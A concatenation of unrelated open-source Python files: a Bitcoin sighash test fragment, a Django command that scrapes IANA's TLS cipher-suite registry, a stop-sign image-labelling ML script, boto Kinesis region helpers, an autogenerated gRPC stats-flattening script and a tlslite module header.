hashtype = int(vector[3]) & 0xffffffff # This must be unsigned int
            sighash = convert.hex_to_bytes(vector[4])[::-1]  # The JSON stores the hash byte-reversed (display order).
my_sighash = transaction.sighash(tx, index, script, hashtype)
self.assertEqual(
sighash,
my_sighash,
'hashtype = {:x}'.format(hashtype)
)
|
hcrudolph/ciphersuite.info
|
refs/heads/master
|
directory/management/commands/scrapeiana.py
|
1
|
from django.core.management.base import BaseCommand, CommandError
from directory.models import CipherSuite, Rfc
from os import linesep
from requests import get
import re
class FailedDownloadException(Exception):
pass
class Command(BaseCommand):
help = 'Scrapes TLS cipher suites from iana.org'
    # Generic filters for TLS cipher suites, as (fieldname, regex) pairs.
    # A parsed line is kept only if every negative filter's regex is found
    # (re.search) in the given field and none of the positive filters'
    # regexes are; otherwise the line is skipped.
def __init__(self):
self.positive_filters = [
('name', 'Unassigned'),
('name', 'Reserved'),
('name', 'EMPTY'),
('name', 'FALLBACK'),
]
self.negative_filters = [
('name', 'TLS'),
]
# inherit everything else from BaseCommand
super().__init__()
def get_csv(self, url='https://www.iana.org/assignments/tls-parameters/tls-parameters-4.csv'):
"""Tries to download the content at the specified URL,
returning the response in plain text format. If status code
equals anything else than 200, FailedDownloadException is thrown"""
response = get(url)
if response.status_code == 200:
return response.text
else:
raise FailedDownloadException()
def split_line(self, line):
result = dict()
info = line.split(',')
result['hex1'] = re.search(r'0x[0-9A-F]{2}', info[0]).group(0)
result['hex2'] = re.search(r'0x[0-9A-F]{2}', info[1]).group(0)
result['name'] = info[2]
# info[3] = DTLS-OK
# info[4] = Recommended
result['rfcs'] = re.search(r'\[(RFC\d+)\]', info[5]).groups()
return result
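    # Example (illustrative input; the IANA CSV quotes the two-byte value,
    # so the naive comma split leaves the quotes on info[0] and info[1]):
    #
    #   split_line('"0x00,0x05",TLS_RSA_WITH_RC4_128_SHA,Y,N,[RFC5246]')
    #   -> {'hex1': '0x00', 'hex2': '0x05',
    #       'name': 'TLS_RSA_WITH_RC4_128_SHA', 'rfcs': ('RFC5246',)}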
def handle(self, *args, **options):
"""Main function to be run when command is executed."""
verbosity = int(options['verbosity'])
# try downloading csv file
try:
csv_file = self.get_csv()
except:
raise CommandError("Failed to download resource from the given URL.")
# counter for successfully inserted or found ciphers
cs_new = cs_old = rfc_new = 0
for line in csv_file.split(linesep):
            # try splitting the line into its separate components, or skip it
try:
d = self.split_line(line)
except:
if verbosity > 1:
self.stdout.write(
self.style.NOTICE("Failed to split line. Skipping.")
)
continue
            # skip the line unless every negative filter's regex matches
            if not all(re.search(f[1], d[f[0]], re.IGNORECASE) for f in self.negative_filters):
                if verbosity > 1:
                    self.stdout.write(
                        self.style.NOTICE("Line filtered out. Skipping.")
                    )
                continue
            # skip the line if any positive filter's regex matches
            if any(re.search(f[1], d[f[0]]) for f in self.positive_filters):
                if verbosity > 1:
                    self.stdout.write(
                        self.style.NOTICE("Line filtered out. Skipping.")
                    )
                continue
# create model instances in DB
c, cstat = CipherSuite.objects.get_or_create(
name = d['name'],
hex_byte_1 = d['hex1'],
hex_byte_2 = d['hex2'],
)
for rfc in d['rfcs']:
regular_rfc = re.match(r'RFC(\d+)', rfc)
draft_rfc = re.match(r'RFC-ietf-tls-rfc(\d+).+', rfc)
if regular_rfc is not None:
rfc_nr = regular_rfc.group(1)
draft_status = False
                elif draft_rfc is not None:
                    rfc_nr = draft_rfc.group(1)
                    draft_status = True
                else:
                    # Unrecognized RFC reference format; skip it.
                    continue
r, rstat = Rfc.objects.get_or_create(
number = rfc_nr,
is_draft = draft_status
)
c.defining_rfcs.add(r)
if rstat:
rfc_new += 1
if verbosity > 2:
self.stdout.write(
self.style.SUCCESS(
f"Successfully created RFC '{r.number}'."
)
)
if cstat:
cs_new += 1
if verbosity > 2:
self.stdout.write(
self.style.SUCCESS(
f"Successfully created Ciphersuite '{c.name}'."
)
)
else:
cs_old += 1
self.stdout.write(
self.style.SUCCESS(
f"Successfully created {cs_new} ({cs_old}) cipher suites and {rfc_new} RFCs."
)
)
|
buckbaskin/stopsign
|
refs/heads/master
|
src/v1/group_by_image.py
|
1
|
#!/usr/bin/env python
import rospkg
import cv2
import datetime
import gc
import joblib
import numpy as np
import pandas as pd
from imblearn.under_sampling import RandomUnderSampler
from sklearn.ensemble import GradientBoostingClassifier
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.linear_model import SGDClassifier
from sklearn.metrics import accuracy_score, precision_score, recall_score
from sklearn.naive_bayes import GaussianNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
rospack = rospkg.RosPack()
pkg_path = rospack.get_path('stopsign')
BULK_DATA_FILE = '%s/data/003_manual_labels/all.csv' % (pkg_path,)
IMAGE_DATA_FILE = '%s/data/005_image_labels/all.csv' % (pkg_path,)
KP_MODEL_STORE_FILE = '%s/data/005_image_labels/kp_classifier.pkl' % (pkg_path,)
start_image_id = 0
end_image_id = 2189
NUM_IMAGES = end_image_id - start_image_id
NUM_ORBS_FEATURES = 500
labels = ['class']
for i in range(0, 32):
labels.append('descr%02d' % (i,))
labels.extend(['angle', 'classid', 'octave', 'x', 'y', 'response', 'size', 'imageid'])
new_labels = ['class']
for i in range(0, 500):
    new_labels.append('orbkp%03d' % i)
def transfer(read_file, write_file):
print('time 0 sec')
start_time = datetime.datetime.now()
kp_classifier = joblib.load(KP_MODEL_STORE_FILE)
    write_file.write(','.join(new_labels) + '\n')
first_line = True
imageid = 0
kp_id = 0
image_has_stopsign = False
writeline = [None] * 501
output_batch = []
for line in read_file:
if first_line:
first_line = False
continue
values = [float(x.strip()) for x in line.split(',')]
values[labels.index('class')] /= 1000.0
values[labels.index('angle')] /= 1000.0
values[labels.index('response')] /= 100000000.0
read_image_id = values[labels.index('imageid')]
# print('read %d vs imgid %d' % (read_image_id, imageid,))
if read_image_id == imageid:
X = np.array(values[1:33]).reshape(1, -1)
y_pred = kp_classifier.predict(X)[0]
image_has_stopsign = image_has_stopsign or y_pred > 0.5
writeline[kp_id + 1] = '%.3f' % float(y_pred)
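            # Clamp so kp_id never indexes past writeline's 501 slots
            # (1 class column + 500 keypoint predictions).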
if kp_id >= 499:
kp_id = 498
kp_id += 1
elif read_image_id - imageid == 1:
assert kp_id == 499
img_class = image_has_stopsign
writeline[0] = str(int(img_class))
output_batch.append(','.join(writeline) + '\n')
if imageid % 20 == 0:
print('Batching image %4d / %4d @ %.2f sec total %.2f sec per' % (
imageid + 1,
end_image_id,
(datetime.datetime.now() - start_time).total_seconds(),
(datetime.datetime.now() - start_time).total_seconds() / (imageid+1),))
imageid += 1
kp_id = 0
image_has_stopsign = False
else:
raise ValueError('Unexpected value for imageid %d from %d' % (read_image_id, imageid))
        if len(output_batch) > 100:
            write_file.write(''.join(output_batch))
            print('write batch 100 %.2f sec total %.2f sec per' % (
                (datetime.datetime.now() - start_time).total_seconds(),
                (datetime.datetime.now() - start_time).total_seconds() / (imageid+1)))
            output_batch = []
    # Flush whatever is left after the final partial batch.
    if output_batch:
        write_file.write(''.join(output_batch))
if __name__ == '__main__':
### Begin the whole process ###
with open(BULK_DATA_FILE, 'r') as kp_f:
with open(IMAGE_DATA_FILE, 'w') as im_f:
transfer(kp_f, im_f)
|
boomsbloom/dtm-fmri
|
refs/heads/master
|
DTM/for_gensim/lib/python2.7/site-packages/boto/kinesis/__init__.py
|
22
|
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.regioninfo import RegionInfo, get_regions
from boto.regioninfo import connect
def regions():
"""
Get all available regions for the Amazon Kinesis service.
:rtype: list
:return: A list of :class:`boto.regioninfo.RegionInfo`
"""
from boto.kinesis.layer1 import KinesisConnection
return get_regions('kinesis', connection_cls=KinesisConnection)
def connect_to_region(region_name, **kw_params):
from boto.kinesis.layer1 import KinesisConnection
return connect('kinesis', region_name,
connection_cls=KinesisConnection, **kw_params)
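# Example usage (sketch; the region name is illustrative and AWS credentials
# must already be configured):
#
#   import boto.kinesis
#   conn = boto.kinesis.connect_to_region('us-east-1')
#   streams = conn.list_streams()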
|
ctiller/grpc
|
refs/heads/master
|
tools/run_tests/performance/massage_qps_stats.py
|
25
|
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Autogenerated by tools/codegen/core/gen_stats_data.py
import massage_qps_stats_helpers
def massage_qps_stats(scenario_result):
for stats in scenario_result["serverStats"] + scenario_result["clientStats"]:
if "coreStats" in stats:
# Get rid of the "coreStats" element and replace it by statistics
# that correspond to columns in the bigquery schema.
core_stats = stats["coreStats"]
del stats["coreStats"]
stats[
"core_client_calls_created"] = massage_qps_stats_helpers.counter(
core_stats, "client_calls_created")
stats[
"core_server_calls_created"] = massage_qps_stats_helpers.counter(
core_stats, "server_calls_created")
stats["core_cqs_created"] = massage_qps_stats_helpers.counter(
core_stats, "cqs_created")
stats[
"core_client_channels_created"] = massage_qps_stats_helpers.counter(
core_stats, "client_channels_created")
stats[
"core_client_subchannels_created"] = massage_qps_stats_helpers.counter(
core_stats, "client_subchannels_created")
stats[
"core_server_channels_created"] = massage_qps_stats_helpers.counter(
core_stats, "server_channels_created")
stats["core_syscall_poll"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_poll")
stats["core_syscall_wait"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_wait")
stats["core_pollset_kick"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick")
stats[
"core_pollset_kicked_without_poller"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kicked_without_poller")
stats[
"core_pollset_kicked_again"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kicked_again")
stats[
"core_pollset_kick_wakeup_fd"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick_wakeup_fd")
stats[
"core_pollset_kick_wakeup_cv"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick_wakeup_cv")
stats[
"core_pollset_kick_own_thread"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_kick_own_thread")
stats["core_syscall_epoll_ctl"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_epoll_ctl")
stats[
"core_pollset_fd_cache_hits"] = massage_qps_stats_helpers.counter(
core_stats, "pollset_fd_cache_hits")
stats[
"core_histogram_slow_lookups"] = massage_qps_stats_helpers.counter(
core_stats, "histogram_slow_lookups")
stats["core_syscall_write"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_write")
stats["core_syscall_read"] = massage_qps_stats_helpers.counter(
core_stats, "syscall_read")
stats[
"core_tcp_backup_pollers_created"] = massage_qps_stats_helpers.counter(
core_stats, "tcp_backup_pollers_created")
stats[
"core_tcp_backup_poller_polls"] = massage_qps_stats_helpers.counter(
core_stats, "tcp_backup_poller_polls")
stats["core_http2_op_batches"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_batches")
stats["core_http2_op_cancel"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_cancel")
stats[
"core_http2_op_send_initial_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_send_initial_metadata")
stats[
"core_http2_op_send_message"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_send_message")
stats[
"core_http2_op_send_trailing_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_send_trailing_metadata")
stats[
"core_http2_op_recv_initial_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_recv_initial_metadata")
stats[
"core_http2_op_recv_message"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_recv_message")
stats[
"core_http2_op_recv_trailing_metadata"] = massage_qps_stats_helpers.counter(
core_stats, "http2_op_recv_trailing_metadata")
stats[
"core_http2_settings_writes"] = massage_qps_stats_helpers.counter(
core_stats, "http2_settings_writes")
stats["core_http2_pings_sent"] = massage_qps_stats_helpers.counter(
core_stats, "http2_pings_sent")
stats[
"core_http2_writes_begun"] = massage_qps_stats_helpers.counter(
core_stats, "http2_writes_begun")
stats[
"core_http2_writes_offloaded"] = massage_qps_stats_helpers.counter(
core_stats, "http2_writes_offloaded")
stats[
"core_http2_writes_continued"] = massage_qps_stats_helpers.counter(
core_stats, "http2_writes_continued")
stats[
"core_http2_partial_writes"] = massage_qps_stats_helpers.counter(
core_stats, "http2_partial_writes")
stats[
"core_http2_initiate_write_due_to_initial_write"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_initial_write")
stats[
"core_http2_initiate_write_due_to_start_new_stream"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_start_new_stream")
stats[
"core_http2_initiate_write_due_to_send_message"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_send_message")
stats[
"core_http2_initiate_write_due_to_send_initial_metadata"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_send_initial_metadata")
stats[
"core_http2_initiate_write_due_to_send_trailing_metadata"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_send_trailing_metadata")
stats[
"core_http2_initiate_write_due_to_retry_send_ping"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_retry_send_ping")
stats[
"core_http2_initiate_write_due_to_continue_pings"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_continue_pings")
stats[
"core_http2_initiate_write_due_to_goaway_sent"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_goaway_sent")
stats[
"core_http2_initiate_write_due_to_rst_stream"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_rst_stream")
stats[
"core_http2_initiate_write_due_to_close_from_api"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_close_from_api")
stats[
"core_http2_initiate_write_due_to_stream_flow_control"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_stream_flow_control")
stats[
"core_http2_initiate_write_due_to_transport_flow_control"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_transport_flow_control")
stats[
"core_http2_initiate_write_due_to_send_settings"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_send_settings")
stats[
"core_http2_initiate_write_due_to_bdp_estimator_ping"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_bdp_estimator_ping")
stats[
"core_http2_initiate_write_due_to_flow_control_unstalled_by_setting"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_flow_control_unstalled_by_setting"
)
stats[
"core_http2_initiate_write_due_to_flow_control_unstalled_by_update"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_flow_control_unstalled_by_update"
)
stats[
"core_http2_initiate_write_due_to_application_ping"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_application_ping")
stats[
"core_http2_initiate_write_due_to_keepalive_ping"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_keepalive_ping")
stats[
"core_http2_initiate_write_due_to_transport_flow_control_unstalled"] = massage_qps_stats_helpers.counter(
core_stats,
"http2_initiate_write_due_to_transport_flow_control_unstalled"
)
stats[
"core_http2_initiate_write_due_to_ping_response"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_ping_response")
stats[
"core_http2_initiate_write_due_to_force_rst_stream"] = massage_qps_stats_helpers.counter(
core_stats, "http2_initiate_write_due_to_force_rst_stream")
stats[
"core_http2_spurious_writes_begun"] = massage_qps_stats_helpers.counter(
core_stats, "http2_spurious_writes_begun")
stats[
"core_hpack_recv_indexed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_indexed")
stats[
"core_hpack_recv_lithdr_incidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_incidx")
stats[
"core_hpack_recv_lithdr_incidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_incidx_v")
stats[
"core_hpack_recv_lithdr_notidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_notidx")
stats[
"core_hpack_recv_lithdr_notidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_notidx_v")
stats[
"core_hpack_recv_lithdr_nvridx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_nvridx")
stats[
"core_hpack_recv_lithdr_nvridx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_lithdr_nvridx_v")
stats[
"core_hpack_recv_uncompressed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_uncompressed")
stats[
"core_hpack_recv_huffman"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_huffman")
stats["core_hpack_recv_binary"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_binary")
stats[
"core_hpack_recv_binary_base64"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_recv_binary_base64")
stats[
"core_hpack_send_indexed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_indexed")
stats[
"core_hpack_send_lithdr_incidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_incidx")
stats[
"core_hpack_send_lithdr_incidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_incidx_v")
stats[
"core_hpack_send_lithdr_notidx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_notidx")
stats[
"core_hpack_send_lithdr_notidx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_notidx_v")
stats[
"core_hpack_send_lithdr_nvridx"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_nvridx")
stats[
"core_hpack_send_lithdr_nvridx_v"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_lithdr_nvridx_v")
stats[
"core_hpack_send_uncompressed"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_uncompressed")
stats[
"core_hpack_send_huffman"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_huffman")
stats["core_hpack_send_binary"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_binary")
stats[
"core_hpack_send_binary_base64"] = massage_qps_stats_helpers.counter(
core_stats, "hpack_send_binary_base64")
stats[
"core_combiner_locks_initiated"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_initiated")
stats[
"core_combiner_locks_scheduled_items"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_scheduled_items")
stats[
"core_combiner_locks_scheduled_final_items"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_scheduled_final_items")
stats[
"core_combiner_locks_offloaded"] = massage_qps_stats_helpers.counter(
core_stats, "combiner_locks_offloaded")
stats[
"core_call_combiner_locks_initiated"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_locks_initiated")
stats[
"core_call_combiner_locks_scheduled_items"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_locks_scheduled_items")
stats[
"core_call_combiner_set_notify_on_cancel"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_set_notify_on_cancel")
stats[
"core_call_combiner_cancelled"] = massage_qps_stats_helpers.counter(
core_stats, "call_combiner_cancelled")
stats[
"core_executor_scheduled_short_items"] = massage_qps_stats_helpers.counter(
core_stats, "executor_scheduled_short_items")
stats[
"core_executor_scheduled_long_items"] = massage_qps_stats_helpers.counter(
core_stats, "executor_scheduled_long_items")
stats[
"core_executor_scheduled_to_self"] = massage_qps_stats_helpers.counter(
core_stats, "executor_scheduled_to_self")
stats[
"core_executor_wakeup_initiated"] = massage_qps_stats_helpers.counter(
core_stats, "executor_wakeup_initiated")
stats[
"core_executor_queue_drained"] = massage_qps_stats_helpers.counter(
core_stats, "executor_queue_drained")
stats[
"core_executor_push_retries"] = massage_qps_stats_helpers.counter(
core_stats, "executor_push_retries")
stats[
"core_server_requested_calls"] = massage_qps_stats_helpers.counter(
core_stats, "server_requested_calls")
stats[
"core_server_slowpath_requests_queued"] = massage_qps_stats_helpers.counter(
core_stats, "server_slowpath_requests_queued")
stats[
"core_cq_ev_queue_trylock_failures"] = massage_qps_stats_helpers.counter(
core_stats, "cq_ev_queue_trylock_failures")
stats[
"core_cq_ev_queue_trylock_successes"] = massage_qps_stats_helpers.counter(
core_stats, "cq_ev_queue_trylock_successes")
stats[
"core_cq_ev_queue_transient_pop_failures"] = massage_qps_stats_helpers.counter(
core_stats, "cq_ev_queue_transient_pop_failures")
h = massage_qps_stats_helpers.histogram(core_stats,
"call_initial_size")
stats["core_call_initial_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_call_initial_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_call_initial_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_call_initial_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_call_initial_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"poll_events_returned")
stats["core_poll_events_returned"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_poll_events_returned_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_poll_events_returned_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_poll_events_returned_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_poll_events_returned_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_write_size")
stats["core_tcp_write_size"] = ",".join("%f" % x for x in h.buckets)
stats["core_tcp_write_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_write_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_write_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_write_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_write_iov_size")
stats["core_tcp_write_iov_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_tcp_write_iov_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_write_iov_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_write_iov_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_write_iov_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats, "tcp_read_size")
stats["core_tcp_read_size"] = ",".join("%f" % x for x in h.buckets)
stats["core_tcp_read_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_read_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_read_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_read_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_read_offer")
stats["core_tcp_read_offer"] = ",".join("%f" % x for x in h.buckets)
stats["core_tcp_read_offer_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_read_offer_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_read_offer_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_read_offer_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"tcp_read_offer_iov_size")
stats["core_tcp_read_offer_iov_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_tcp_read_offer_iov_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_tcp_read_offer_iov_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_tcp_read_offer_iov_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_tcp_read_offer_iov_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"http2_send_message_size")
stats["core_http2_send_message_size"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_message_size_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_message_size_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_message_size_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_message_size_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_initial_metadata_per_write")
stats["core_http2_send_initial_metadata_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_initial_metadata_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_initial_metadata_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_initial_metadata_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_initial_metadata_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_message_per_write")
stats["core_http2_send_message_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_message_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_message_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_message_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_message_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_trailing_metadata_per_write")
stats["core_http2_send_trailing_metadata_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats[
"core_http2_send_trailing_metadata_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_trailing_metadata_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_trailing_metadata_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_trailing_metadata_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(
core_stats, "http2_send_flowctl_per_write")
stats["core_http2_send_flowctl_per_write"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_http2_send_flowctl_per_write_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_http2_send_flowctl_per_write_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_http2_send_flowctl_per_write_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_http2_send_flowctl_per_write_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
h = massage_qps_stats_helpers.histogram(core_stats,
"server_cqs_checked")
stats["core_server_cqs_checked"] = ",".join(
"%f" % x for x in h.buckets)
stats["core_server_cqs_checked_bkts"] = ",".join(
"%f" % x for x in h.boundaries)
stats[
"core_server_cqs_checked_50p"] = massage_qps_stats_helpers.percentile(
h.buckets, 50, h.boundaries)
stats[
"core_server_cqs_checked_95p"] = massage_qps_stats_helpers.percentile(
h.buckets, 95, h.boundaries)
stats[
"core_server_cqs_checked_99p"] = massage_qps_stats_helpers.percentile(
h.buckets, 99, h.boundaries)
|
ThinkingBridge/platform_external_chromium_org
|
refs/heads/kitkat
|
third_party/tlslite/tlslite/utils/keyfactory.py
|
361
|
"""Factory functions for asymmetric cryptography.
@sort: generateRSAKey, parseXMLKey, parsePEMKey, parseAsPublicKey,
parseAsPrivateKey
"""
from compat import *
from RSAKey import RSAKey
